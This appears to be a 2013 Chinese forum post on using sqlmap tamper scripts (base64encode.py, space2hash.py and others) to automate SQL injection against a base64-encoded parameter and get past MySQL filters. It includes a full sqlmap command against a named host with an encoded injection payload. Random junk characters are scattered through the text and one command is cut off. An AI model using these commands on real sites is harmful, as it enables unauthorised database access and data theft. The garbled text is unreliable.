WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?9 w: L; q3 j' e4 v; X y$ {
& E; U9 n4 F& w" Z9 nsqlmap的tamper里有个base64encode.py
/ e7 f' O1 _2 L% `; y
' T+ O* \- G7 f4 C使用如下
# q5 W6 ^" K% `
- \6 P% \( _2 z6 w% asqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
; Y9 y9 o N+ H) B7 _* v
* q# J P1 @. l# }# `8 H' N3 m# ]
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
" M# O4 `: Y2 i, d2 B9 E7 I( H3 }6 E9 X; E3 c; m1 i6 c& v
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
4 B' g, o% X( I$ j$ D5 a; y6 f! e/ z9 Q$ |8 i6 e. n8 Z `+ Q
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入7 _; ~- @2 G& W2 m
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入. q7 p/ A+ D& n' H$ l
首先确定目标数据库版本,然后选择相应的脚本。
T) _2 j* k2 E( }7 u-v 3 --batch --tamper "space2hash.py"
! k. P$ N5 X' ^! m; i: h) F; k- d$ @8 I: S4 F" c
还有其他一些插件:) M. C; @' x) W! P+ l8 B3 Y. V" j" Y
encodes编码 ——charencode.py1 @& X2 c5 J/ l/ c( }* p) N/ O
base64编码 —— base64encode.py
0 K4 C9 R' s- A7 }. L替换空格和关键字 —— halfversionedmorekeywords.py
3 K% \3 n3 l. U% K# `" r |
* F2 Q& n& G t9 R$ l/ [) `3 i
% }, h$ L! O- P' U. q9 M5 q, P: _9 U" w7 @$ @- l
, p7 v( M* G$ n; h# y9 a8 @- h9 T
|
发表于 2013-11-23 15:50:45
收藏
支持
反对